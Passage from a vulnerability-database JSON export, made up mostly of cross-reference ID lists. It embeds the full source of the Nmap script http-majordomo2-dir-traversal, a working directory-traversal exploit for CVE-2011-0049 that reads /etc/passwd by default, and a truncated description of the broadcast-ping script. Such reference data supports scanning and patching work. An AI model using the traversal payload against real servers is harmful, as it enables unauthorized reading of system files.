"NMAP:MS-SQL-XP-CMDSHELL.NSE", "NMAP:MSRPC-ENUM.NSE", "NMAP:MTRACE.NSE", "NMAP:MURMUR-VERSION.NSE", "NMAP:MYSQL-AUDIT.NSE", "NMAP:MYSQL-BRUTE.NSE", "NMAP:MYSQL-DATABASES.NSE", "NMAP:MYSQL-DUMP-HASHES.NSE", "NMAP:MYSQL-EMPTY-PASSWORD.NSE", "NMAP:MYSQL-ENUM.NSE", "NMAP:MYSQL-INFO.NSE", "NMAP:MYSQL-QUERY.NSE", "NMAP:MYSQL-USERS.NSE", "NMAP:MYSQL-VARIABLES.NSE", "NMAP:MYSQL-VULN-CVE2012-2122.NSE", "NMAP:NAT-PMP-INFO.NSE", "NMAP:NAT-PMP-MAPPORT.NSE", "NMAP:NBD-INFO.NSE", "NMAP:NBNS-INTERFACES.NSE", "NMAP:NBSTAT.NSE", "NMAP:NCP-ENUM-USERS.NSE", "NMAP:NCP-SERVERINFO.NSE", "NMAP:NDMP-FS-INFO.NSE", "NMAP:NDMP-VERSION.NSE", "NMAP:NESSUS-BRUTE.NSE", "NMAP:NESSUS-XMLRPC-BRUTE.NSE", "NMAP:NETBUS-AUTH-BYPASS.NSE", "NMAP:NETBUS-BRUTE.NSE", "NMAP:NETBUS-INFO.NSE", "NMAP:NETBUS-VERSION.NSE", "NMAP:NEXPOSE-BRUTE.NSE", "NMAP:NFS-LS.NSE", "NMAP:NFS-SHOWMOUNT.NSE", "NMAP:NFS-STATFS.NSE", "NMAP:NJE-NODE-BRUTE.NSE", "NMAP:NJE-PASS-BRUTE.NSE", "NMAP:NNTP-NTLM-INFO.NSE", "NMAP:NPING-BRUTE.NSE", "NMAP:NRPE-ENUM.NSE", "NMAP:NTP-INFO.NSE", "NMAP:NTP-MONLIST.NSE", "NMAP:OMP2-BRUTE.NSE", "NMAP:OMP2-ENUM-TARGETS.NSE", "NMAP:OMRON-INFO.NSE", "NMAP:OPENFLOW-INFO.NSE", "NMAP:OPENLOOKUP-INFO.NSE", "NMAP:OPENVAS-OTP-BRUTE.NSE", "NMAP:OPENWEBNET-DISCOVERY.NSE", "NMAP:ORACLE-BRUTE-STEALTH.NSE", "NMAP:ORACLE-BRUTE.NSE", "NMAP:ORACLE-ENUM-USERS.NSE", "NMAP:ORACLE-SID-BRUTE.NSE", "NMAP:ORACLE-TNS-VERSION.NSE", "NMAP:OVS-AGENT-VERSION.NSE", "NMAP:P2P-CONFICKER.NSE", "NMAP:PATH-MTU.NSE", "NMAP:PCANYWHERE-BRUTE.NSE", "NMAP:PCWORX-INFO.NSE", "NMAP:PGSQL-BRUTE.NSE", "NMAP:PJL-READY-MESSAGE.NSE", "NMAP:POP3-BRUTE.NSE", "NMAP:POP3-CAPABILITIES.NSE", "NMAP:POP3-NTLM-INFO.NSE", "NMAP:PORT-STATES.NSE", "NMAP:PPTP-VERSION.NSE", "NMAP:PUPPET-NAIVESIGNING.NSE", "NMAP:QCONN-EXEC.NSE", "NMAP:QSCAN.NSE", "NMAP:QUAKE1-INFO.NSE", "NMAP:QUAKE3-INFO.NSE", "NMAP:QUAKE3-MASTER-GETSERVERS.NSE", "NMAP:RDP-ENUM-ENCRYPTION.NSE", "NMAP:RDP-NTLM-INFO.NSE", "NMAP:RDP-VULN-MS12-020.NSE", "NMAP:REALVNC-AUTH-BYPASS.NSE", "NMAP:REDIS-BRUTE.NSE", "NMAP:REDIS-INFO.NSE", "NMAP:RESOLVEALL.NSE", "NMAP:REVERSE-INDEX.NSE", "NMAP:REXEC-BRUTE.NSE", "NMAP:RFC868-TIME.NSE", "NMAP:RIAK-HTTP-INFO.NSE", "NMAP:RLOGIN-BRUTE.NSE", "NMAP:RMI-DUMPREGISTRY.NSE", "NMAP:RMI-VULN-CLASSLOADER.NSE", "NMAP:RPC-GRIND.NSE", "NMAP:RPCAP-BRUTE.NSE", "NMAP:RPCAP-INFO.NSE", "NMAP:RPCINFO.NSE", "NMAP:RSA-VULN-ROCA.NSE", "NMAP:RSYNC-BRUTE.NSE", "NMAP:RSYNC-LIST-MODULES.NSE", "NMAP:RTSP-METHODS.NSE", "NMAP:RTSP-URL-BRUTE.NSE", "NMAP:RUSERS.NSE", "NMAP:S7-INFO.NSE", "NMAP:SAMBA-VULN-CVE-2012-1182.NSE", "NMAP:SERVICETAGS.NSE", "NMAP:SHODAN-API.NSE", "NMAP:SIP-BRUTE.NSE", "NMAP:SIP-CALL-SPOOF.NSE", "NMAP:SIP-ENUM-USERS.NSE", "NMAP:SIP-METHODS.NSE", "NMAP:SKYPEV2-VERSION.NSE", "NMAP:SMB-BRUTE.NSE", "NMAP:SMB-DOUBLE-PULSAR-BACKDOOR.NSE", "NMAP:SMB-ENUM-DOMAINS.NSE", "NMAP:SMB-ENUM-GROUPS.NSE", "NMAP:SMB-ENUM-PROCESSES.NSE", "NMAP:SMB-ENUM-SERVICES.NSE", "NMAP:SMB-ENUM-SESSIONS.NSE", "NMAP:SMB-ENUM-SHARES.NSE", "NMAP:SMB-ENUM-USERS.NSE", "NMAP:SMB-FLOOD.NSE", "NMAP:SMB-LS.NSE", "NMAP:SMB-MBENUM.NSE", "NMAP:SMB-OS-DISCOVERY.NSE", "NMAP:SMB-PRINT-TEXT.NSE", "NMAP:SMB-PROTOCOLS.NSE", "NMAP:SMB-PSEXEC.NSE", "NMAP:SMB-SECURITY-MODE.NSE", "NMAP:SMB-SERVER-STATS.NSE", "NMAP:SMB-SYSTEM-INFO.NSE", "NMAP:SMB-VULN-CONFICKER.NSE", "NMAP:SMB-VULN-CVE-2017-7494.NSE", "NMAP:SMB-VULN-CVE2009-3103.NSE", "NMAP:SMB-VULN-MS06-025.NSE", "NMAP:SMB-VULN-MS07-029.NSE", "NMAP:SMB-VULN-MS08-067.NSE", "NMAP:SMB-VULN-MS10-054.NSE", "NMAP:SMB-VULN-MS10-061.NSE", "NMAP:SMB-VULN-MS17-010.NSE", "NMAP:SMB-VULN-REGSVC-DOS.NSE", "NMAP:SMB-VULN-WEBEXEC.NSE", "NMAP:SMB-WEBEXEC-EXPLOIT.NSE", "NMAP:SMB2-CAPABILITIES.NSE", "NMAP:SMB2-SECURITY-MODE.NSE", "NMAP:SMB2-TIME.NSE", "NMAP:SMB2-VULN-UPTIME.NSE", "NMAP:SMTP-BRUTE.NSE", "NMAP:SMTP-COMMANDS.NSE", "NMAP:SMTP-ENUM-USERS.NSE", "NMAP:SMTP-NTLM-INFO.NSE", "NMAP:SMTP-OPEN-RELAY.NSE", "NMAP:SMTP-STRANGEPORT.NSE", "NMAP:SMTP-VULN-CVE2010-4344.NSE", "NMAP:SMTP-VULN-CVE2011-1720.NSE", "NMAP:SMTP-VULN-CVE2011-1764.NSE", "NMAP:SNIFFER-DETECT.NSE", "NMAP:SNMP-BRUTE.NSE", "NMAP:SNMP-HH3C-LOGINS.NSE", "NMAP:SNMP-INFO.NSE", "NMAP:SNMP-INTERFACES.NSE", "NMAP:SNMP-IOS-CONFIG.NSE", "NMAP:SNMP-NETSTAT.NSE", "NMAP:SNMP-PROCESSES.NSE", "NMAP:SNMP-SYSDESCR.NSE", "NMAP:SNMP-WIN32-SERVICES.NSE", "NMAP:SNMP-WIN32-SHARES.NSE", "NMAP:SNMP-WIN32-SOFTWARE.NSE", "NMAP:SNMP-WIN32-USERS.NSE", "NMAP:SOCKS-AUTH-INFO.NSE", "NMAP:SOCKS-BRUTE.NSE", "NMAP:SOCKS-OPEN-PROXY.NSE", "NMAP:SSH-AUTH-METHODS.NSE", "NMAP:SSH-BRUTE.NSE", "NMAP:SSH-HOSTKEY.NSE", "NMAP:SSH-PUBLICKEY-ACCEPTANCE.NSE", "NMAP:SSH-RUN.NSE", "NMAP:SSH2-ENUM-ALGOS.NSE", "NMAP:SSHV1.NSE", "NMAP:SSL-CCS-INJECTION.NSE", "NMAP:SSL-CERT-INTADDR.NSE", "NMAP:SSL-CERT.NSE", "NMAP:SSL-DATE.NSE", "NMAP:SSL-DH-PARAMS.NSE", "NMAP:SSL-ENUM-CIPHERS.NSE", "NMAP:SSL-HEARTBLEED.NSE", "NMAP:SSL-KNOWN-KEY.NSE", "NMAP:SSL-POODLE.NSE", "NMAP:SSLV2-DROWN.NSE", "NMAP:SSLV2.NSE", "NMAP:SSTP-DISCOVER.NSE", "NMAP:STUN-INFO.NSE", "NMAP:STUN-VERSION.NSE", "NMAP:STUXNET-DETECT.NSE", "NMAP:SUPERMICRO-IPMI-CONF.NSE", "NMAP:SVN-BRUTE.NSE", "NMAP:TARGETS-ASN.NSE", "NMAP:TARGETS-IPV6-MAP4TO6.NSE", "NMAP:TARGETS-IPV6-MULTICAST-ECHO.NSE", "NMAP:TARGETS-IPV6-MULTICAST-INVALID-DST.NSE", "NMAP:TARGETS-IPV6-MULTICAST-MLD.NSE", "NMAP:TARGETS-IPV6-MULTICAST-SLAAC.NSE", "NMAP:TARGETS-IPV6-WORDLIST.NSE", "NMAP:TARGETS-SNIFFER.NSE", "NMAP:TARGETS-TRACEROUTE.NSE", "NMAP:TARGETS-XML.NSE", "NMAP:TEAMSPEAK2-VERSION.NSE", "NMAP:TELNET-BRUTE.NSE", "NMAP:TELNET-ENCRYPTION.NSE", "NMAP:TELNET-NTLM-INFO.NSE", "NMAP:TFTP-ENUM.NSE", "NMAP:TLS-ALPN.NSE", "NMAP:TLS-NEXTPROTONEG.NSE", "NMAP:TLS-TICKETBLEED.NSE", "NMAP:TN3270-SCREEN.NSE", "NMAP:TOR-CONSENSUS-CHECKER.NSE", "NMAP:TRACEROUTE-GEOLOCATION.NSE", "NMAP:TSO-BRUTE.NSE", "NMAP:TSO-ENUM.NSE", "NMAP:UBIQUITI-DISCOVERY.NSE", "NMAP:UNITTEST.NSE", "NMAP:UNUSUAL-PORT.NSE", "NMAP:UPNP-INFO.NSE", "NMAP:UPTIME-AGENT-INFO.NSE", "NMAP:URL-SNARF.NSE", "NMAP:VENTRILO-INFO.NSE", "NMAP:VERSANT-INFO.NSE", "NMAP:VMAUTHD-BRUTE.NSE", "NMAP:VMWARE-VERSION.NSE", "NMAP:VNC-BRUTE.NSE", "NMAP:VNC-INFO.NSE", "NMAP:VNC-TITLE.NSE", "NMAP:VOLDEMORT-INFO.NSE", "NMAP:VTAM-ENUM.NSE", "NMAP:VULNERS.NSE", "NMAP:VUZE-DHT-INFO.NSE", "NMAP:WDB-VERSION.NSE", "NMAP:WEBLOGIC-T3-INFO.NSE", "NMAP:WHOIS-DOMAIN.NSE", "NMAP:WHOIS-IP.NSE", "NMAP:WSDD-DISCOVER.NSE", "NMAP:X11-ACCESS.NSE", "NMAP:XDMCP-DISCOVER.NSE", "NMAP:XMLRPC-METHODS.NSE", "NMAP:XMPP-BRUTE.NSE", "NMAP:XMPP-INFO.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123690", "OPENVAS:1361412562310123695", "OPENVAS:1361412562310123940", "OPENVAS:1361412562310123943", "OPENVAS:1361412562310703860", "OPENVAS:136141256231071254", "OPENVAS:136141256231071279", "OPENVAS:136141256231071548", "OPENVAS:1361412562310801838", "OPENVAS:1361412562310802794", "OPENVAS:1361412562310811055", "OPENVAS:1361412562310831574", "OPENVAS:1361412562310840980", "OPENVAS:1361412562310843180", "OPENVAS:1361412562310850203", "OPENVAS:1361412562310850289", "OPENVAS:1361412562310851557", "OPENVAS:1361412562310851559", "OPENVAS:1361412562310864158", "OPENVAS:1361412562310864174", "OPENVAS:1361412562310864200", "OPENVAS:1361412562310864205", "OPENVAS:1361412562310864213", "OPENVAS:1361412562310864238", "OPENVAS:1361412562310864306", "OPENVAS:1361412562310865323", "OPENVAS:1361412562310865347", "OPENVAS:1361412562310870581", "OPENVAS:1361412562310870584", "OPENVAS:1361412562310870928", "OPENVAS:1361412562310870935", "OPENVAS:1361412562310871821", "OPENVAS:1361412562310871822", "OPENVAS:1361412562310872718", "OPENVAS:1361412562310872719", "OPENVAS:1361412562310881179", "OPENVAS:1361412562310881194", "OPENVAS:1361412562310881228", "OPENVAS:1361412562310881650", "OPENVAS:1361412562310881654", "OPENVAS:1361412562310881680", "OPENVAS:1361412562310882723", "OPENVAS:1361412562310882724", "OPENVAS:1361412562310882726", "OPENVAS:1361412562310890951", "OPENVAS:1361412562311220171104", "OPENVAS:1361412562311220171105", "OPENVAS:703860", "OPENVAS:71254", "OPENVAS:71279", "OPENVAS:71548", "OPENVAS:802794", "OPENVAS:831574", "OPENVAS:840980", "OPENVAS:850203", "OPENVAS:850289", "OPENVAS:864158", "OPENVAS:864174", "OPENVAS:864200", "OPENVAS:864205", "OPENVAS:864213", "OPENVAS:864238", "OPENVAS:864306", "OPENVAS:865323", "OPENVAS:865347", "OPENVAS:870581", "OPENVAS:870584", "OPENVAS:870928", "OPENVAS:870935", "OPENVAS:881179", "OPENVAS:881194", "OPENVAS:881228", "OPENVAS:881650", "OPENVAS:881654", "OPENVAS:881680"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0465", "ELSA-2012-0466", "ELSA-2012-0478", "ELSA-2013-0506", "ELSA-2013-0515", "ELSA-2017-1270", "ELSA-2017-1271", "ELSA-2017-1272", "ELSA-2017-1950", "ELSA-2018-1860"]}, {"type": "osv", "idList": ["OSV:DLA-951-1", "OSV:DSA-2450-1", "OSV:DSA-3860-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116843", "PACKETSTORM:116953", "PACKETSTORM:142657", "PACKETSTORM:142715", "PACKETSTORM:142782", "PACKETSTORM:98116"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F", "RAPID7COMMUNITY:41DCA564C1D56E5188C09BCC956BC029", "RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "redhat", "idList": ["RHSA-2012:0465", "RHSA-2012:0466", "RHSA-2012:0478", "RHSA-2013:0506", "RHSA-2013:0515", "RHSA-2017:1270", "RHSA-2017:1271", "RHSA-2017:1272", "RHSA-2017:1273", "RHSA-2017:1390"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-7494"]}, {"type": "saint", "idList": ["SAINT:3579A721D51A069C725493EA48A26E42", "SAINT:6FE788CBA26F517C02B44A699047593B", "SAINT:C50A339EFD5B2F96051BC00F96014CAA"]}, {"type": "samba", "idList": ["SAMBA:CVE-2012-1182", "SAMBA:CVE-2017-7494"]}, {"type": "securelist", "idList": ["SECURELIST:A16165B9EDE725C7470E1FA5D469DA0F"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25607", "SECURITYVULNS:DOC:28165", "SECURITYVULNS:VULN:11397", "SECURITYVULNS:VULN:12328", "SECURITYVULNS:VULN:12426", "SECURITYVULNS:VULN:12518"]}, {"type": "seebug", "idList": ["SSV:60050", "SSV:70661", "SSV:93139"]}, {"type": "slackware", "idList": ["SSA-2017-144-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0507-1", "OPENSUSE-SU-2012:0508-1", "OPENSUSE-SU-2017:1401-1", "OPENSUSE-SU-2017:1415-1", "SUSE-SU-2012:0500-1", "SUSE-SU-2012:0501-1", "SUSE-SU-2012:0501-2", "SUSE-SU-2012:0502-1", "SUSE-SU-2012:0504-1", "SUSE-SU-2012:0515-1", "SUSE-SU-2017:1391-1", "SUSE-SU-2017:1392-1", "SUSE-SU-2017:1393-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9"]}, {"type": "thn", "idList": ["THN:4706A097E7EBD85B2426246B35CDC5E6", "THN:590A2A4F40D408F427266EBA5EE7B530", "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "THN:9DF1743B35B2E69D4835136091D08EAD", "THN:B1F7A116FFB321FFB433B2511F0594AA"]}, {"type": "threatpost", "idList": ["THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1", "THREATPOST:6B393C6EA80E795EF303485AFABE5327", "THREATPOST:B108BD1ECF3200F21B65BFC1C849F747"]}, {"type": "ubuntu", "idList": ["USN-1423-1", "USN-3296-1", "USN-3296-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-1182", "UB:CVE-2017-7494"]}, {"type": "zdi", "idList": ["ZDI-12-061", "ZDI-12-062", "ZDI-12-063", "ZDI-12-064", "ZDI-12-068", "ZDI-12-069", "ZDI-12-070", "ZDI-12-071", "ZDI-12-072"]}, {"type": "zdt", "idList": ["1337DAY-ID-27836", "1337DAY-ID-27859"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-834"]}, {"type": "archlinux", "idList": ["ASA-201705-22"]}, {"type": "attackerkb", "idList": ["AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4"]}, {"type": "avleonov", "idList": ["AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627"]}, {"type": "canvas", "idList": ["SAMBA_IS_KNOWN_PIPENAME"]}, {"type": "centos", "idList": ["CESA-2017:1270", "CESA-2017:1271"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0444"]}, {"type": "cisa", "idList": ["CISA:384A71FB1AD858FAC86EEB1A7660E778"]}, {"type": "cisco", "idList": ["CISCO-SA-20170530-SAMBA"]}, {"type": "cve", "idList": ["CVE-2011-0049", "CVE-2017-7494"]}, {"type": "debian", "idList": ["DEBIAN:DLA-951-1:1BAA2", "DEBIAN:DSA-3860-1:8B793"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-7494"]}, {"type": "exploitdb", "idList": ["EDB-ID:42060", "EDB-ID:42084"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:11BDEE18B40708887778CCF837705185"]}, {"type": "f5", "idList": ["F5:K13551136", "SOL13719"]}, {"type": "fedora", "idList": ["FEDORA:0B8006061CC2", "FEDORA:219F3605E539", "FEDORA:79D7720B02", "FEDORA:BC7B0601FC16"]}, {"type": "fireeye", "idList": ["FIREEYE:DC498F7CA24681C582F008B675092B7D"]}, {"type": "freebsd", "idList": ["6F4D96C0-4062-11E7-B291-B499BAEBFEAF", "BAF37CD2-8351-11E1-894E-00215C6A37BB"]}, {"type": "gentoo", "idList": ["GLSA-201805-07"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170613-01-SAMBA", "HUAWEI-SA-20171129-01-SAMBA"]}, {"type": "ibm", "idList": ["82248DC9C1F555BF98367B4387954D2C23BFE20908CE565E0127C6A3FC16193E", "CE6756539D503C94C0FE819367133FAF5CF98E845923A4230C5E49923B068701"]}, {"type": "ics", "idList": ["ICSA-17-180-02"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/MAJORDOMO2_DIRECTORY_TRAVERSAL", "MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786440", "MYHACK58:62201786477", "MYHACK58:62201786521", "MYHACK58:62201786995"]}, {"type": "nessus", "idList": ["ALA_ALAS-2017-834.NASL", "CENTOS_RHSA-2017-1270.NASL", "CENTOS_RHSA-2017-1271.NASL", "DEBIAN_DLA-951.NASL", "DEBIAN_DSA-3860.NASL", "EULEROS_SA-2017-1104.NASL", "EULEROS_SA-2017-1105.NASL", "FEDORA_2017-570C0071C4.NASL", "FEDORA_2017-642A0ECA75.NASL", "FREEBSD_PKG_6F4D96C0406211E7B291B499BAEBFEAF.NASL", "OPENSUSE-2017-613.NASL", "OPENSUSE-2017-618.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "ORACLELINUX_ELSA-2017-1270.NASL", "ORACLELINUX_ELSA-2017-1271.NASL", "ORACLELINUX_ELSA-2017-1272.NASL", "REDHAT-RHSA-2013-0515.NASL", "REDHAT-RHSA-2017-1270.NASL", "REDHAT-RHSA-2017-1271.NASL", "REDHAT-RHSA-2017-1272.NASL", "REDHAT-RHSA-2017-1273.NASL", "REDHAT-RHSA-2017-1390.NASL", "SLACKWARE_SSA_2017-144-01.NASL", "SL_20170524_SAMBA4_ON_SL6_X.NASL", "SL_20170524_SAMBA_ON_SL6_X.NASL", "SUSE_SU-2017-1391-1.NASL", "SUSE_SU-2017-1392-1.NASL", "SUSE_SU-2017-1393-1.NASL", "SUSE_SU-2017-1396-1.NASL", "UBUNTU_USN-3296-1.NASL", "UBUNTU_USN-3296-2.NASL"]}, {"type": "nmap", "idList": ["NMAP:AJP-HEADERS.NSE", "NMAP:AUTH-OWNERS.NSE", "NMAP:BROADCAST-DNS-SERVICE-DISCOVERY.NSE", "NMAP:BROADCAST-IGMP-DISCOVERY.NSE", "NMAP:BROADCAST-LISTENER.NSE", "NMAP:CICS-INFO.NSE", "NMAP:CITRIX-ENUM-SERVERS.NSE", "NMAP:CLAMAV-EXEC.NSE", "NMAP:COUCHDB-DATABASES.NSE", "NMAP:DAYTIME.NSE", "NMAP:DNS-CACHE-SNOOP.NSE", "NMAP:DNS-SERVICE-DISCOVERY.NSE", "NMAP:FTP-SYST.NSE", "NMAP:HADOOP-TASKTRACKER-INFO.NSE", "NMAP:HDDTEMP-INFO.NSE", "NMAP:HTTP-ADOBE-COLDFUSION-APSA1301.NSE", "NMAP:HTTP-APACHE-SERVER-STATUS.NSE", "NMAP:HTTP-COOKIE-FLAGS.NSE", "NMAP:HTTP-GENERATOR.NSE", "NMAP:HTTP-INTERNAL-IP-DISCLOSURE.NSE", "NMAP:HTTP-NTLM-INFO.NSE", "NMAP:MS-SQL-XP-CMDSHELL.NSE", "NMAP:MYSQL-VARIABLES.NSE", "NMAP:NAT-PMP-INFO.NSE", "NMAP:ORACLE-ENUM-USERS.NSE", "NMAP:POP3-NTLM-INFO.NSE", "NMAP:RFC868-TIME.NSE", "NMAP:RPC-GRIND.NSE", "NMAP:S7-INFO.NSE", "NMAP:SSH-PUBLICKEY-ACCEPTANCE.NSE", "NMAP:SSH-RUN.NSE", "NMAP:SSL-DH-PARAMS.NSE", "NMAP:TARGETS-IPV6-MAP4TO6.NSE", "NMAP:TARGETS-IPV6-MULTICAST-INVALID-DST.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123690", "OPENVAS:136141256231014259", "OPENVAS:136141256231071254", "OPENVAS:1361412562310881179", "OPENVAS:1361412562310890951", "OPENVAS:864174", "OPENVAS:864213", "OPENVAS:865347"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-1270", "ELSA-2017-1271", "ELSA-2017-1272"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142657", "PACKETSTORM:142715", "PACKETSTORM:142782"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F", "RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "redhat", "idList": ["RHSA-2017:1271"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-7494"]}, {"type": "saint", "idList": ["SAINT:3579A721D51A069C725493EA48A26E42", "SAINT:C50A339EFD5B2F96051BC00F96014CAA"]}, {"type": "samba", "idList": ["SAMBA:CVE-2012-1182"]}, {"type": "securelist", "idList": ["SECURELIST:A16165B9EDE725C7470E1FA5D469DA0F"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12426"]}, {"type": "seebug", "idList": ["SSV:93139"]}, {"type": "slackware", "idList": ["SSA-2017-144-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:1401-1", "OPENSUSE-SU-2017:1415-1", "SUSE-SU-2017:1391-1", "SUSE-SU-2017:1392-1", "SUSE-SU-2017:1393-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9"]}, {"type": "thn", "idList": ["THN:4706A097E7EBD85B2426246B35CDC5E6", "THN:590A2A4F40D408F427266EBA5EE7B530", "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "THN:9DF1743B35B2E69D4835136091D08EAD", "THN:B1F7A116FFB321FFB433B2511F0594AA"]}, {"type": "threatpost", "idList": ["THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1", "THREATPOST:6B393C6EA80E795EF303485AFABE5327", "THREATPOST:B108BD1ECF3200F21B65BFC1C849F747"]}, {"type": "ubuntu", "idList": ["USN-3296-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-7494"]}, {"type": "zdi", "idList": ["ZDI-12-062"]}, {"type": "zdt", "idList": ["1337DAY-ID-27836"]}]}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1660004461, "score": 1659975605}, "_internal": {"score_hash": "99365abae13f9645471e0bedad4c69cd"}, "sourceData": "local http = require \"http\"\nlocal io = require \"io\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nExploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).\n\nVulnerability originally discovered by Michael Brooks.\n\nFor more information about this vulnerability:\n* http://www.mj2.org/\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049\n* http://www.exploit-db.com/exploits/16103/\n]]\n\n---\n-- @usage\n-- nmap -p80 --script http-majordomo2-dir-traversal <host/ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 80/tcp open http syn-ack\n-- | http-majordomo2-dir-traversal: /etc/passwd was found:\n-- |\n-- | root:x:0:0:root:/root:/bin/bash\n-- | bin:x:1:1:bin:/bin:/sbin/nologin\n-- |\n--\n-- @args http-majordomo2-dir-traversal.rfile Remote file to download. Default: /etc/passwd\n-- @args http-majordomo2-dir-traversal.uri URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr\n-- @args http-majordomo2-dir-traversal.outfile If set it saves the remote file to this location.\n--\n-- Other arguments you might want to use with this script:\n-- * http.useragent - Sets user agent\n--\n\nauthor = \"Paulino Calderon <calderon@websec.mx>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"vuln\", \"exploit\"}\n\n\nportrule = shortport.http\n\nlocal MAJORDOMO2_EXPLOIT_QRY = \"?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../..\"\nlocal MAJORDOMO2_EXPLOIT_URI = \"/cgi-bin/mj_wwwusr\"\nlocal DEFAULT_REMOTE_FILE = \"/etc/passwd\"\n\n---\n--Writes string to file\n--Taken from: hostmap.nse\nlocal function write_file(filename, contents)\n local f, err = io.open(filename, \"w\")\n if not f then\n return f, err\n end\n f:write(contents)\n f:close()\n return true\nend\n\n---\n-- MAIN\n---\naction = function(host, port)\n local response, rfile, rpath, uri, evil_uri, rfile_content, filewrite\n local output_lines = {}\n\n filewrite = stdnse.get_script_args(\"http-majordomo2-dir-traversal.outfile\")\n uri = stdnse.get_script_args(\"http-majordomo2-dir-traversal.uri\") or MAJORDOMO2_EXPLOIT_URI\n rfile = stdnse.get_script_args(\"http-majordomo2-dir-traversal.rfile\") or DEFAULT_REMOTE_FILE\n evil_uri = uri..MAJORDOMO2_EXPLOIT_QRY..rfile\n\n stdnse.debug1(\"HTTP GET %s%s\", stdnse.get_hostname(host), evil_uri)\n response = http.get(host, port, evil_uri)\n if response.body and response.status==200 then\n if response.body:match(\"unknowntopic\") then\n stdnse.debug1(\"[Error] The server is not vulnerable, '%s' was not found or the web server has insufficient permissions to read it\", rfile)\n return\n end\n local _\n _, _, rfile_content = string.find(response.body, '<pre>(.*)<!%-%- Majordomo help_foot format file %-%->')\n output_lines[#output_lines+1] = rfile..\" was found:\\n\"..rfile_content\n if filewrite then\n local status, err = write_file(filewrite, rfile_content)\n if status then\n output_lines[#output_lines+1] = string.format(\"%s saved to %s\\n\", rfile, filewrite)\n else\n output_lines[#output_lines+1] = string.format(\"Error saving %s to %s: %s\\n\", rfile, filewrite, err)\n end\n end\n return table.concat(output_lines, \"\\n\")\n end\nend\n", "nmap": {"scriptType": "portrule", "categories": ["intrusive", "vuln", "exploit"]}}

{"nmap": [{"lastseen": "2022-02-15T21:46:51", "description": "Sends broadcast pings on a selected interface using raw ethernet packets and outputs the responding hosts' IP and MAC addresses or (if requested) adds them as targets. Root privileges on UNIX are required to run this script since it uses raw sockets. Most operating systems don't respond to broadcast-ping probes, but they can be configured to do so. \n\nThe interface on which is broadcasted can be specified using the -e Nmap option or the `broadcast-ping.interface` script-arg. If no interface is specified this script broadcasts on all ethernet interfaces which have an IPv4 address defined. \n\nThe `newtarget` script-arg can be used so the script adds the discovered IPs as targets. \n\nThe timeout of the ICMP probes can be specified using the `timeout` script-arg. The default timeout is 3000 ms. A higher number might be necessary when scanning across larger networks. \n\nThe number of sent probes can be specified using the `num-probes` script-arg. The default number is 1. A higher value might get more results on larger networks. \n\nThe ICMP probes sent comply with the --ttl and --data-length Nmap options, so you can use those to control the TTL(time to live) and ICMP payload length respectively. The default value for TTL is 64, and the length of the payload is 0. The payload is consisted of random bytes.\n\n## Script Arguments \n\n#### broadcast-ping.timeout \n\ntimespec specifying how long to wait for response (default 3s)\n\n#### broadcast-ping.num_probes \n\nnumber specifying how many ICMP probes should be sent (default 1)\n\n#### broadcast-ping.interface \n\nstring specifying which interface to use for this script (default all interfaces)\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -e 